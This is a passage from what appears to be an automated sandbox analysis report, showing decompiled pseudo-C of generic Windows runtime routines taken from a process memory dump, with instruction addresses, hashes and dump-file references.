											E02B04888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E02A9EB70(_t95, 0x2b779a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E02AC95D0();
											L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E02AC95D0();
											L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E02A9EB70(_t93, 0x2b779a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E02AC95D0();
										L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E02AC95D0();
										L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E02ABF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x02a852a5
0x02a852ad
0x02a852b0
0x02a852b3
0x02a852b7
0x02a852ba
0x02a852bf
0x02a852c4
0x02a852cc
0x00000000
0x00000000
0x02a852ce
0x02a852d9
0x02a852dd
0x02a852e7
0x02a852f7
0x02a852f9
0x02a852fd
0x02ae0dcf
0x02ae0dd5
0x02ae0dd6
0x02ae0dd7
0x02ae0dd8
0x02ae0dd9
0x02ae0dde
0x02ae0ddf
0x02ae0de0
0x02ae0de1
0x02ae0de2
0x02ae0de5
0x02ae0dea
0x02ae0dec
0x02ae0f60
0x02ae0f64
0x02ae0f70
0x02ae0f76
0x02ae0f79
0x02ae0f79
0x00000000
0x02ae0f64
0x02ae0df2
0x02ae0df7
0x02ae0e04
0x02ae0e0d
0x02ae0e0d
0x02ae0e10
0x02ae0e1a
0x02ae0e1c
0x02ae0e4c
0x02ae0e52
0x02ae0e61
0x02ae0e67
0x02ae0e6b
0x02ae0e70
0x02ae0e76
0x02ae0ed7
0x02ae0edc
0x02ae0ee0
0x02ae0ee6
0x02ae0eea
0x02ae0eed
0x02ae0ef0
0x02ae0ef3
0x02ae0ef6
0x02ae0ef9
0x02ae0efe
0x02ae0f01
0x02ae0f01
0x02ae0f0b
0x02ae0f12
0x02ae0f16
0x02ae0f18
0x02ae0f1b
0x02ae0f2c
0x02ae0f31
0x02ae0f31
0x02ae0f35
0x02ae0f39
0x02ae0f3a
0x02ae0f3c
0x02ae0f3f
0x02ae0f50
0x02ae0f55
0x02ae0f55
0x02ae0f59
0x02a852eb
0x02a852f1
0x02a852f1
0x02ae0e7d
0x02ae0e84
0x02ae0e88
0x02ae0e8a
0x02ae0e8d
0x02ae0e9e
0x02ae0ea3
0x02ae0ea3
0x02ae0ea7
0x02ae0eaf
0x02ae0eb3
0x02ae0eb9
0x02ae0eb9
0x02ae0ebc
0x02ae0ecd
0x02ae0ecd
0x00000000
0x02ae0eb3
0x02ae0e21
0x02ae0e2b
0x02ae0e2f
0x02ae0e30
0x02ae0e3a
0x02ae0e3f
0x02ae0e41
0x00000000
0x00000000
0x02ae0e47
0x00000000
0x02ae0e47
0x02ae0df9
0x02ae0dfe
0x00000000
0x00000000
0x00000000
0x02ae0dfe
0x02a85303
0x02a85307
0x00000000
0x02a85309
0x00000000
0x02a85309
0x02a85307
0x02a852e9
0x02a852e9
0x00000000
0x02a852e9
0x02a8530e
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faefda75c7d88c603ba445613b8e083abaa485b4e30c579ebd325daaaf96f2f5
Instruction ID: 9e4e8cfdb574fd2de003e466a6111f6185cb636653530bbf9869c4370dd17483
Opcode Fuzzy Hash: faefda75c7d88c603ba445613b8e083abaa485b4e30c579ebd325daaaf96f2f5
Instruction Fuzzy Hash: B351BB31645342EBDB21EF64CA80B27BBE9FF44710F15091EE99697652EF70E804CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02AB2AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AB2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x2b78204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x2b78208; // 0x2b78207
				_t8 = _t57 + 0x2b78208; // 0x2b78207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x2b78450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x2b7821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x2b76d5c; // 0x7f360654
							_t72 =  *0x2b76d5c; // 0x7f360654
							_t75 =  *0x2b76d5c; // 0x7f360654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x2b76d5c; // 0x7f360654
							_t84 =  *0x2b76d5c; // 0x7f360654
							_t87 =  *0x2b76d5c; // 0x7f360654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E02ACF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x02ab2ae4
0x02ab2aec
0x02ab2aef
0x02ab2af4
0x02ab2af7
0x02ab2afd
0x02ab2b92
0x02ab2b92
0x02ab2b97
0x02ab2b9c
0x02ab2b9c
0x02ab2b03
0x02ab2b06
0x02ab2b09
0x02ab2b09
0x02ab2b0f
0x02ab2b15
0x02ab2b15
0x02ab2b1b
0x02ab2b1e
0x02ab2b21
0x02ab2b26
0x02ab2b29
0x02ab2b81
0x02ab2b84
0x02ab2c0e
0x02ab2c15
0x02ab2c24
0x02ab2c24
0x02ab2b8a
0x02ab2b8a
0x02ab2b8a
0x02ab2b8a
0x02ab2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x02ab2b4a
0x02ab2b4a
0x02ab2b4d
0x02ab2b53
0x00000000
0x00000000
0x02ab2b55
0x02ab2b58
0x02ab2bb7
0x02af5d1b
0x02af5d37
0x02af5d47
0x02af5d53
0x02ab2bbd
0x02ab2bbd
0x02ab2bbd
0x02ab2bb7
0x02ab2b5d
0x02ab2c2f
0x02af5d5b
0x02af5d77
0x02af5d87
0x02af5d93
0x02ab2c35
0x02ab2c35
0x02ab2c35
0x02ab2c2f
0x02ab2b65
0x02ab2b9f
0x02ab2ba2
0x02ab2b67
0x02ab2b67
0x02ab2b69
0x02ab2b6b
0x02ab2b6e
0x02ab2bc9
0x02ab2bcc
0x02ab2bcf
0x02ab2bd4
0x02ab2bd6
0x02ab2bd6
0x02ab2bdb
0x02ab2c02
0x02ab2c05
0x02ab2c07
0x00000000
0x02ab2c07
0x02ab2be0
0x02ab2c00
0x02ab2c3f
0x02ab2c3f
0x00000000
0x02ab2c00
0x02ab2be5
0x02ab2be7
0x02ab2bec
0x02ab2bf4
0x02ab2bf6
0x00000000
0x02ab2bf6
0x02ab2b70
0x02ab2b76
0x02ab2b2b
0x02ab2b2b
0x02ab2b2d
0x02ab2b2f
0x02ab2b32
0x02ab2b35
0x02ab2b3a
0x00000000
0x02ab2b40
0x02ab2b43
0x02ab2b45
0x02ab2b47
0x02ab2b4a
0x02ab2b4d
0x02ab2b53
0x00000000
0x00000000
0x00000000
0x02ab2b53
0x02ab2b78
0x02ab2b78
0x02ab2b7b
0x02ab2b7e
0x00000000
0x02ab2b7e
0x02ab2b76
0x02ab2ba5
0x02ab2ba5
0x02ab2ba8
0x02ab2bad
0x00000000
0x00000000
0x02ab2baf
0x02ab2baf
0x02ab2bc2
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2e7a5439e1888fc263e477a6075ec288937f06102956528059a6fe6aa8f1857
Instruction ID: 13375cf73397a420ef4dcc920d304c7ff618814a230e6b2ead71b61bec55dc93
Opcode Fuzzy Hash: e2e7a5439e1888fc263e477a6075ec288937f06102956528059a6fe6aa8f1857
Instruction Fuzzy Hash: 4B51BD76A001158FCB19CF29C880AFDB7B9FF88700716845BED469B312DF34AA51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A9EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E02A9EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E02A89080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x770bc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E02A82D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x02a9ef4b
0x02a9ef4d
0x02a9ef57
0x02a9f0bd
0x02a9f0c2
0x02a9f0d2
0x02a9f0d2
0x02a9f0c2
0x02a9ef5d
0x02a9ef5f
0x02a9ef67
0x02a9ef6a
0x02a9ef6d
0x02a9ef74
0x02a9ef7f
0x02a9ef82
0x02a9ef82
0x02a9ef86
0x02a9ef88
0x02a9ef8c
0x02a9ef8f
0x02a9ef8f
0x02a9ef8f
0x00000000
0x02a9ef91
0x02a9ef93
0x02a9efc4
0x02a9efc4
0x02a9efc4
0x02a9efca
0x02a9efd0
0x02a9f0a6
0x00000000
0x00000000
0x02a9f0af
0x02aebb06
0x02aebb0a
0x02a9f0b5
0x02a9f0b5
0x02a9f0b5
0x02a9f0b5
0x00000000
0x02a9efd6
0x02a9efd9
0x02a9f0de
0x02a9f0e2
0x02a9efdf
0x02a9efdf
0x02a9efdf
0x02a9efe5
0x02aebafc
0x02aebafc
0x02a9efe5
0x02a9efeb
0x02a9efed
0x02a9f00f
0x02a9f011
0x02a9f01a
0x02a9f01d
0x02a9f021
0x02a9f028
0x02a9f029
0x02a9f029
0x02a9f02c
0x00000000
0x02a9f02c
0x02a9eff3
0x02a9eff9
0x02a9f0ea
0x02a9f0ed
0x02a9f0ef
0x00000000
0x02a9f0ef
0x02a9f003
0x02aebb12
0x02a9f045
0x02a9f049
0x02a9f051
0x02a9f09e
0x02a9f0a0
0x02a9f0a0
0x02a9f09e
0x02a9f053
0x02a9f064
0x02a9f064
0x02a9f06b
0x02aebb1a
0x02aebb1a
0x02a9f071
0x02a9f071
0x02a9f07d
0x02a9f082
0x02a9f08f
0x02a9f08f
0x02a9f009
0x02a9f00d
0x00000000
0x02a9f00d
0x02a9efd0
0x02a9ef97
0x02a9efa5
0x02a9efaa
0x00000000
0x02a9efac
0x02a9efac
0x02a9efac
0x00000000
0x02a9efb2
0x02a9f036
0x02a9f03a
0x02a9f040
0x02a9f090
0x00000000
0x02a9f092
0x02a9f042
0x00000000
0x02a9f042
0x02a9efb7
0x02a9efb9
0x02a9efbc
0x02a9efb0
0x02a9efb0
0x00000000
0x02a9efbe
0x02a9efbe
0x02a9efc1
0x00000000
0x02a9efc1
0x02a9efbc
0x02a9efaa
0x02a9ef91

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: efac7d900e4b4a557f83ac08edd1df28ffedee688577ef2f8147eae32558db81
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 68510430E04245DFDF10CB6AC2D47AEBBF1AF15318F1881ABC445D7682DB75A989C751

Uniqueness

Uniqueness Score: -1.00%

Function 02B5740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E02B5740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E02ADD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E02ACF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L02AA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L02AA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E02ACF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L02AA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x02b5740d
0x02b5740d
0x02b57412
0x02b57413
0x02b57416
0x02b57418
0x02b5741c
0x02b5741f
0x02b57422
0x02b57422
0x02b57428
0x02b5742a
0x02b5742a
0x02b57451
0x02b57432
0x02b5744f
0x02b5744f
0x00000000
0x02b57434
0x02b57438
0x02b57443
0x02b57517
0x02b57517
0x02b5751a
0x02b57535
0x02b57520
0x02b57527
0x02b5752c
0x02b57531
0x02b57533
0x00000000
0x02b57533
0x00000000
0x02b57531
0x02b5754b
0x02b5754f
0x02b5755c
0x02b5755c
0x02b5755f
0x02b57560
0x02b57561
0x02b57562
0x02b57563
0x02b57568
0x02b5756a
0x02b5756c
0x02b5756d
0x02b5756d
0x02b5756f
0x02b57572
0x02b57574
0x02b57577
0x02b5757c
0x02b5757f
0x00000000
0x02b57551
0x02b57551
0x02b57551
0x02b57553
0x02b57553
0x02b57449
0x02b57449
0x02b5744c
0x02b5744c
0x00000000
0x02b5744c
0x02b57443
0x02b5750e
0x02b57514
0x02b57514
0x02b57455
0x02b57469
0x02b5746d
0x00000000
0x02b57473
0x02b57473
0x02b57476
0x02b57480
0x02b57484
0x02b5748e
0x02b57493
0x02b57493
0x02b57496
0x02b57499
0x02b574a1
0x02b574b1
0x02b574b5
0x00000000
0x02b574bb
0x02b574c1
0x02b574c1
0x02b574c4
0x02b574c5
0x02b574c6
0x02b574c7
0x02b574c8
0x02b574cd
0x00000000
0x02b574d3
0x02b574d3
0x02b574d6
0x02b574d8
0x02b574db
0x02b574dd
0x02b574e0
0x02b574e7
0x02b574ee
0x02b574ee
0x02b574f4
0x02b574f9
0x00000000
0x02b574fb
0x02b574fb
0x02b574fd
0x02b57500
0x02b57503
0x02b57505
0x02b57505
0x02b574f9
0x00000000
0x02b574cd
0x02b574b5
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 23ed7bbce63ba4faae79522c4c749afb9b238fc9831d636edc775675d7a7393c
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 5D516971640606EFCB16CF14D980B96FBB5FF45304F1981AAE9089F212EB71E946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AB2990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E02AB2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x2b5ff00);
				E02ADD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2a61664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E02ACE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2a61668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E02B051BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x2a6166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
